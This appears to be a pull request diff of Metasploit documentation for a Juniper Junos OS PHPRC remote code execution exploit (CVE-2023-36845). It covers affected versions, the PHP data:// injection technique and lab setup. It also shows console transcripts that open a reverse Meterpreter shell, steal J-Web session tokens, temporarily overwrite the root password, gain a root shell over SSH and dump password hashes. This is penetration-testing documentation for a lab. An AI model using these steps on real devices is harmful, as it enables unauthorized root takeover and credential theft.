### PR TITLE
Juniper Junos OS PHPRC Manipulation RCE (CVE-2023-36845)

### DIFF
--- a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
+++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -87,20 +87,20 @@ msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
 
 Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
 
-   Name         Current Setting  Required  Description
-   ----         ---------------  --------  -----------
-   JAIL_BREAK   false            no        Break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that ssh root logon is enabled on th
-                                           e device
-   PASSWORD     XzBC04qz         no        If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password
-   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS       192.168.140.143  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT        80               yes       The target port (TCP)
-   SSH_PORT     22               yes       SSH port of Junos Target
-   SSH_TIMEOUT  30               no        Specify the maximum time to negotiate a SSH session
-   SSL          false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
-   URIPATH                       no        The URI to use for this exploit (default is random)
-   VHOST                         no        HTTP server virtual host
+   Name               Current Setting           Required  Description
+   ----               ---------------           --------  -----------
+   JAIL_BREAK         false                     no        Break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that 'ssh root-login'
+                                                           is set to 'allow' on the device
+   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.140.143           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              80                        yes       The target port (TCP)
+   SSH_PORT           22                        yes       SSH port of Junos Target
+   SSH_TIMEOUT        30                        no        The maximum acceptable amount of time to negotiate a SSH session
+   SSL                false                     no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                      no        Path to a custom SSL certificate (default is randomly generated)
+   TMP_ROOT_PASSWORD  zeZQKHSMNcUk5XYAdHZCyfkY  no        If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password
+   URIPATH                                      no        The URI to use for this exploit (default is random)
+   VHOST                                        no        HTTP server virtual host
 
 
    When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
@@ -155,20 +155,20 @@ msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
 
 Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
 
-   Name         Current Setting  Required  Description
-   ----         ---------------  --------  -----------
-   JAIL_BREAK   true             no        Break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that ssh root logon is enabled on th
-                                           e device
-   PASSWORD     ny254H9X         no        If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password
-   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS       192.168.140.143  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT        80               yes       The target port (TCP)
-   SSH_PORT     22               yes       SSH port of Junos Target
-   SSH_TIMEOUT  30               no        Specify the maximum time to negotiate a SSH session
-   SSL          false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
-   URIPATH                       no        The URI to use for this exploit (default is random)
-   VHOST                         no        HTTP server virtual host
+   Name               Current Setting           Required  Description
+   ----               ---------------           --------  -----------
+   JAIL_BREAK         true                      no        Break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that 'ssh root-login'
+                                                           is set to 'allow' on the device
+   Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.140.143           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              80                        yes       The target port (TCP)
+   SSH_PORT           22                        yes       SSH port of Junos Target
+   SSH_TIMEOUT        30                        no        The maximum acceptable amount of time to negotiate a SSH session
+   SSL                false                     no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                      no        Path to a custom SSL certificate (default is randomly generated)
+   TMP_ROOT_PASSWORD  zeZQKHSMNcUk5XYAdHZCyfkY  no        If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password
+   URIPATH                                      no        The URI to use for this exploit (default is random)
+   VHOST                                        no        HTTP server virtual host
 
 
    When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

--- a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
+++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -36,6 +36,12 @@ function is `allow_url_include` which allows the use of URL-aware `fopen` wrappe
 `allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses
 `data://` to provide a file inline which includes the base64 encoded PHP payload.
 
+By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
+datastore option `JAIL_BREAK`, that when set to true, will steal the necessary tokens from a user authenticated
+to the J-Web application, in order to over write the root password hash. If there is no user authenticated
+to the J-Web application this method will not work. The module then authenticates with the new root password over
+SSH and then rewrites the original root password hash to /etc/master.passwd.
+
 ### Setup
 
 1. Navigate to the following URL: https://www.juniper.net/us/en/dm/download-next-gen-vsrx-firewall-trial.html
@@ -68,23 +74,33 @@ function is `allow_url_include` which allows the use of URL-aware `fopen` wrappe
 
 ## Scenarios
 
-### PHP Meterpreter junos-vsrx3-x86-64-20.2R1.10.scsi.ova
+### PHP Meterpreter (JAIL_BREAK = False) junos-vsrx3-x86-64-20.2R1.10.scsi.ova
 
 ```
-msf6> use freebsd/http/junos_phprc_auto_prepend_file
+msf6 >  use exploit/freebsd/http/junos_phprc_auto_prepend_file
+[*] Using configured payload php/meterpreter/reverse_tcp
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.140.143
+rhosts => 192.168.140.143
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.140.78
+lhost => 192.168.140.78
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
 
 Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
 
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS   192.168.0.247    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT    80               yes       The target port (TCP)
-   SSL      false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
-   URIPATH                   no        The URI to use for this exploit (default is random)
-   VHOST                     no        HTTP server virtual host
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   JAIL_BREAK   false            no        Break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that ssh root logon is enabled on th
+                                           e device
+   PASSWORD     XzBC04qz         no        If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.140.143  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        80               yes       The target port (TCP)
+   SSH_PORT     22               yes       SSH port of Junos Target
+   SSH_TIMEOUT  30               no        Specify the maximum time to negotiate a SSH session
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                       no        The URI to use for this exploit (default is random)
+   VHOST                         no        HTTP server virtual host
 
 
    When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
@@ -99,7 +115,7 @@ Payload options (php/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.0.77     yes       The listen address (an interface may be specified)
+   LHOST  192.168.140.78   yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -107,31 +123,96 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Junos OS SRX Firewall / EX Switch
+   0   PHP In-Memory
 
 
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.0.247
-rhosts => 192.168.0.247
-msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.0.77
-lhost => 192.168.0.77
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run
 
-[*] Started reverse TCP handler on 192.168.0.77:4444
+[*] Started reverse TCP handler on 192.168.140.78:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
-[*] Sending stage (39927 bytes) to 192.168.0.247
-[*] Meterpreter session 4 opened (192.168.0.77:4444 -> 192.168.0.247:58995) at 2023-09-20 16:27:04 -0400
+[*] Sending stage (39927 bytes) to 192.168.140.143
+[*] Meterpreter session 1 opened (192.168.140.78:4444 -> 192.168.140.143:61886) at 2023-09-26 16:34:51 -0400
 
 meterpreter > getuid
 Server username: nobody
-meterpreter > sysinfoi
-[-] Unknown command: sysinfoi
 meterpreter > sysinfo
 Computer    : JUNOS
 OS          : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/
 Meterpreter : php/freebsd
-meterpreter >
+```
+
+### Interactive WebSocket (JAIL_BREAK = true) junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
+```
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set target 1
+target => 1
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set JAIL_BREAK true
+JAIL_BREAK => true
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
+
+Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   JAIL_BREAK   true             no        Break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that ssh root logon is enabled on th
+                                           e device
+   PASSWORD     ny254H9X         no        If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.140.143  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT        80               yes       The target port (TCP)
+   SSH_PORT     22               yes       SSH port of Junos Target
+   SSH_TIMEOUT  30               no        Specify the maximum time to negotiate a SSH session
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                       no        The URI to use for this exploit (default is random)
+   VHOST                         no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/interact):
+
+   Name  Current Setting  Required  Description
+   ----  ---------------  --------  -----------
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Interactive WebSocket
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > rexploit
+[*] Reloading module...
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
+[*] Found PHPSESSID: 57b074b4a30ef88a4ead6cf7180ea3a78fbd7050.
+[*] Found csrf token: 74c0ab2186dce72ba7f3f2bc6364ec3c.
+[*] Original encrypted root password: $6$Fd5vweLkrV6C.kE6$UThNJP5is2A03IL.h3BDG78BMUHRWyHdvGYv7v5.NzL5mAdMhoa0E7IGKryaqz6aJf5c0435ua1h9wTuPfkQK0
+[*] Temporary root password Hash: $6$GxOlQvBahvEGyMkD$2v/gQHhFPB7/NNPvarEtD4XMMOyxmGqXrTZi1YnRuvBtIZ2CWUhA9FBtjJMjT87RbwjXL1LBOqXBEoT2Ke548.
+[*] Successfully changed the root user's password to ny254H9X
+[+] Logged in as root
+[*] Found shell.
+[*] Rewriting the original root password hash to /etc/master.passwd
+[*] Command shell session 3 opened (192.168.140.78:54969 -> 192.168.140.143:22) at 2023-09-26 16:08:37 -0400
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
+uname -a
+FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64
+
 ```

--- a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
+++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -38,7 +38,7 @@ function is `allow_url_include` which allows the use of URL-aware `fopen` wrappe
 
 By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a
 datastore option `JAIL_BREAK`, that when set to true, will steal the necessary tokens from a user authenticated
-to the J-Web application, in order to over write the root password hash. If there is no user authenticated
+to the J-Web application, in order to overwrite the root password hash. If there is no user authenticated
 to the J-Web application this method will not work. The module then authenticates with the new root password over
 SSH and then rewrites the original root password hash to /etc/master.passwd.
 

--- a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
+++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -1,0 +1,137 @@
+## Vulnerable Application
+
+This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls
+and EX switches.
+
+Juniper Networks Junos OS affected SRX Series:
+
+- All versions prior to 20.4R3-S8.
+- 21.1 version 21.1R1 and later versions.
+- 21.2 versions prior to 21.2R3-S6.
+- 21.3 versions prior to 21.3R3-S5.
+- 21.4 versions prior to 21.4R3-S5.
+- 22.1 versions prior to 22.1R3-S3.
+- 22.2 versions prior to 22.2R3-S2.
+- 22.3 versions prior to 22.3R2-S2, 22.3R3.
+- 22.4 versions prior to 22.4R2-S1, 22.4R3.
+
+Juniper Networks Junos OS affected EX Series:
+
+- All versions prior to 20.4R3-S8.
+- 21.1 version 21.1R1 and later versions.
+- 21.2 versions prior to 21.2R3-S6.
+- 21.3 versions prior to 21.3R3-S5.
+- 21.4 versions prior to 21.4R3-S4.
+- 22.1 versions prior to 22.1R3-S3.
+- 22.2 versions prior to 22.2R3-S1.
+- 22.3 versions prior to 22.3R2-S2, 22.3R3.
+- 22.4 versions prior to 22.4R2-S1, 22.4R3.
+
+### Description
+
+The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin
+by opening `/dev/fd/0`. The exploit also makes use of two useful PHP features. The first being
+`auto_prepend_file` which causes the provided file to be added using the `require` function. The second PHP
+function is `allow_url_include` which allows the use of URL-aware `fopen` wrappers. By enabling
+`allow_url_include`, the exploit can use any protocol wrapper with `auto_prepend_file`. The module then uses
+`data://` to provide a file inline which includes the base64 encoded PHP payload.
+
+### Setup
+
+1. Navigate to the following URL: https://www.juniper.net/us/en/dm/download-next-gen-vsrx-firewall-trial.html
+1. Setup an account and download the free trail of: `junos-vsrx3-x86-64-20.2R1.10.scsi.ova`
+1. Boot
+1. Log in as `root` / no password
+1. Run `cli`
+1. Run `configure`
+1. Set password: `set system root-authentication plain-text-password`
+1. Set hostname: `set system host-name (host-name)`
+1. Set up the management interface: `set interfaces fxp0 unit 0 family inet dhcp-client`
+1. Set up the traffic interfaces: `set interfaces ge-0/0/0 unit 0 family inet dhcp-client`
+1. Set up security zones: `set security zones security-zone trust interfaces ge-0/0/0.0`
+1. Validate the config: `commit check`
+   - If you typo'd something, you can `rollback` here and try again
+1. Commit: `commit`
+1. Exit config, then exit CLI: `exit` then `exit`
+1. Reboot: `reboot`
+1. Log in with your new account
+1. Run `cli` again
+1.Get the ip address with `show interfaces terse | match fxp`
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use freebsd/http/junos_phprc_auto_prepend_file`
+1. Set the `RHOST`, `LHOST`
+1. Run the module
+1. Receive a Meterpreter session as the `nobody` user.
+
+## Scenarios
+
+### PHP Meterpreter junos-vsrx3-x86-64-20.2R1.10.scsi.ova
+
+```
+msf6> use freebsd/http/junos_phprc_auto_prepend_file
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
+
+Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.0.247    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.0.77     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Junos OS SRX Firewall / EX Switch
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.0.247
+rhosts => 192.168.0.247
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.0.77
+lhost => 192.168.0.77
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run
+
+[*] Started reverse TCP handler on 192.168.0.77:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
+[*] Sending stage (39927 bytes) to 192.168.0.247
+[*] Meterpreter session 4 opened (192.168.0.77:4444 -> 192.168.0.247:58995) at 2023-09-20 16:27:04 -0400
+
+meterpreter > getuid
+Server username: nobody
+meterpreter > sysinfoi
+[-] Unknown command: sysinfoi
+meterpreter > sysinfo
+Computer    : JUNOS
+OS          : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/
+Meterpreter : php/freebsd
+meterpreter >
+```

--- a/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
+++ b/documentation/modules/exploit/freebsd/http/junos_phprc_auto_prepend_file.md
@@ -74,13 +74,13 @@ SSH and then rewrites the original root password hash to /etc/master.passwd.
 
 ## Scenarios
 
-### PHP Meterpreter (JAIL_BREAK = False) junos-vsrx3-x86-64-20.2R1.10.scsi.ova
+### PHP In-Memory, junos-vsrx3-x86-64-20.2R1.10.scsi.ova
 
 ```
-msf6 >  use exploit/freebsd/http/junos_phprc_auto_prepend_file
+msf6 > use exploit/freebsd/http/junos_phprc_auto_prepend_file
 [*] Using configured payload php/meterpreter/reverse_tcp
-msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.140.143
-rhosts => 192.168.140.143
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set rhosts 192.168.140.91
+rhosts => 192.168.140.91
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set lhost 192.168.140.78
 lhost => 192.168.140.78
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
@@ -89,16 +89,14 @@ Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
 
    Name               Current Setting           Required  Description
    ----               ---------------           --------  -----------
-   JAIL_BREAK         false                     no        Break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that 'ssh root-login'
-                                                           is set to 'allow' on the device
    Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS             192.168.140.143           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RHOSTS             192.168.140.91            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT              80                        yes       The target port (TCP)
    SSH_PORT           22                        yes       SSH port of Junos Target
-   SSH_TIMEOUT        30                        no        The maximum acceptable amount of time to negotiate a SSH session
+   SSH_TIMEOUT        30                        yes       The maximum acceptable amount of time to negotiate a SSH session
    SSL                false                     no        Negotiate SSL/TLS for outgoing connections
    SSLCert                                      no        Path to a custom SSL certificate (default is randomly generated)
-   TMP_ROOT_PASSWORD  zeZQKHSMNcUk5XYAdHZCyfkY  no        If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password
+   TMP_ROOT_PASSWORD  gCg6b3NTs10qWjiRVSsjAv7n  yes       If target is set to "Interactive WebSocket with jail break", the root user's password will be temporarily changed to this password
    URIPATH                                      no        The URI to use for this exploit (default is random)
    VHOST                                        no        HTTP server virtual host
 
@@ -134,8 +132,8 @@ msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run
 [*] Started reverse TCP handler on 192.168.140.78:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
-[*] Sending stage (39927 bytes) to 192.168.140.143
-[*] Meterpreter session 1 opened (192.168.140.78:4444 -> 192.168.140.143:61886) at 2023-09-26 16:34:51 -0400
+[*] Sending stage (39927 bytes) to 192.168.140.91
+[*] Meterpreter session 1 opened (192.168.140.78:4444 -> 192.168.140.91:50791) at 2023-09-28 14:13:50 -0400
 
 meterpreter > getuid
 Server username: nobody
@@ -143,30 +141,38 @@ meterpreter > sysinfo
 Computer    : JUNOS
 OS          : FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/
 Meterpreter : php/freebsd
+meterpreter > exit
 ```
 
-### Interactive WebSocket (JAIL_BREAK = true) junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
+### Interactive WebSocket with jail break junos-vsrx3-x86-64-20.2R1.10.scsi.ova 
 ```
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   PHP In-Memory
+    1   Interactive WebSocket with jail break
+
+
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set target 1
 target => 1
-msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > set JAIL_BREAK true
-JAIL_BREAK => true
 msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > options
 
 Module options (exploit/freebsd/http/junos_phprc_auto_prepend_file):
 
    Name               Current Setting           Required  Description
    ----               ---------------           --------  -----------
-   JAIL_BREAK         true                      no        Break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd. This requires that a user is authenticated to the J-Web application in order to steal a session token, also that 'ssh root-login'
-                                                           is set to 'allow' on the device
    Proxies                                      no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS             192.168.140.143           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RHOSTS             192.168.140.91            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
    RPORT              80                        yes       The target port (TCP)
    SSH_PORT           22                        yes       SSH port of Junos Target
-   SSH_TIMEOUT        30                        no        The maximum acceptable amount of time to negotiate a SSH session
+   SSH_TIMEOUT        30                        yes       The maximum acceptable amount of time to negotiate a SSH session
    SSL                false                     no        Negotiate SSL/TLS for outgoing connections
    SSLCert                                      no        Path to a custom SSL certificate (default is randomly generated)
-   TMP_ROOT_PASSWORD  zeZQKHSMNcUk5XYAdHZCyfkY  no        If JAIL_BREAK is set to true, the root users password will be temporarily changed to this password
+   TMP_ROOT_PASSWORD  gCg6b3NTs10qWjiRVSsjAv7n  yes       If target is set to "Interactive WebSocket with jail break", the root user's password will be temporarily changed to this password
    URIPATH                                      no        The URI to use for this exploit (default is random)
    VHOST                                        no        HTTP server virtual host
 
@@ -189,30 +195,42 @@ Exploit target:
 
    Id  Name
    --  ----
-   1   Interactive WebSocket
+   1   Interactive WebSocket with jail break
 
 
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > rexploit
-[*] Reloading module...
+msf6 exploit(freebsd/http/junos_phprc_auto_prepend_file) > run
 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target appears to be vulnerable. Environment variable manipulation succeeded indicating this target is vulnerable.
-[*] Found PHPSESSID: 57b074b4a30ef88a4ead6cf7180ea3a78fbd7050.
-[*] Found csrf token: 74c0ab2186dce72ba7f3f2bc6364ec3c.
-[*] Original encrypted root password: $6$Fd5vweLkrV6C.kE6$UThNJP5is2A03IL.h3BDG78BMUHRWyHdvGYv7v5.NzL5mAdMhoa0E7IGKryaqz6aJf5c0435ua1h9wTuPfkQK0
-[*] Temporary root password Hash: $6$GxOlQvBahvEGyMkD$2v/gQHhFPB7/NNPvarEtD4XMMOyxmGqXrTZi1YnRuvBtIZ2CWUhA9FBtjJMjT87RbwjXL1LBOqXBEoT2Ke548.
-[*] Successfully changed the root user's password to ny254H9X
+[*] Attempting to break out of FreeBSD jail by changing the root user's password, establishing an SSH session and then rewriting the original root user's password hash to /etc/master.passwd.
+[!] This requires a user is authenticated to the J-Web application in order to steal a session token, also 'ssh root-login' is set to 'allow' on the device
+[*] Found PHPSESSID: 90c641904f64e8378036ac32b8a6dfc860cf3256.
+[*] Found csrf token: 6bd37a3776124d00f495f4306f0c8c91.
+[*] Original encrypted root password: $6$bh9nWhr5sA0mjcZl$LURCntyXrzMfD1vaoawkahj5n86d9k4tTBzYs1zvSfVfDT1U8ricpkO7mDD2AjgciCXx.bNVEFcgk3wOs3YDb1
+[*] Temporary root password Hash: $6$EHgi8RZTDSrDA2Zd$UTT5xh8F04TClznHUh6w8kZMeiN2icS7HZo1Eef03epX.vDxmVi6h2kssx1O.qrbDucKtRt7h/IoFRjWvEQvU1
+[*] Successfully changed the root user's password to gCg6b3NTs10qWjiRVSsjAv7n
 [+] Logged in as root
 [*] Found shell.
 [*] Rewriting the original root password hash to /etc/master.passwd
-[*] Command shell session 3 opened (192.168.140.78:54969 -> 192.168.140.143:22) at 2023-09-26 16:08:37 -0400
+[*] Command shell session 2 opened (192.168.140.78:49763 -> 192.168.140.91:22) at 2023-09-28 14:14:39 -0400
 
 id
 uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(field),31(guest),73(config)
 uname -a
 FreeBSD JUNOS JNPR-11.0-20200608.0016468_buil FreeBSD JNPR-11.0-20200608.0016468_builder_stable_11 #0 r356482+0016468ed6c(stable/11): Sun Jun  7 23:59:18 PDT 2020     builder@feyrith.juniper.net:/volume/build/junos/occam/llvm-5.0/sandbox-20200605/freebsd/stable_11/20200605.171711_builder_stable_11.0016468/obj/amd64/juniper/kernels/JNPR-AMD64-PRD/kernel  amd64
-
+cat /etc/master.passwd
+root:$6$bh9nWhr5sA0mjcZl$LURCntyXrzMfD1vaoawkahj5n86d9k4tTBzYs1zvSfVfDT1U8ricpkO7mDD2AjgciCXx.bNVEFcgk3wOs3YDb1:0:0:super-user:0:0:Charlie &:/root:/bin/csh
+daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
+operator:*:2:5:operator:0:0:System &:/:/sbin/nologin
+tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
+kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
+sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
+ext:*:39:39:super-user:0:0:External applications:/:/sbin/nologin
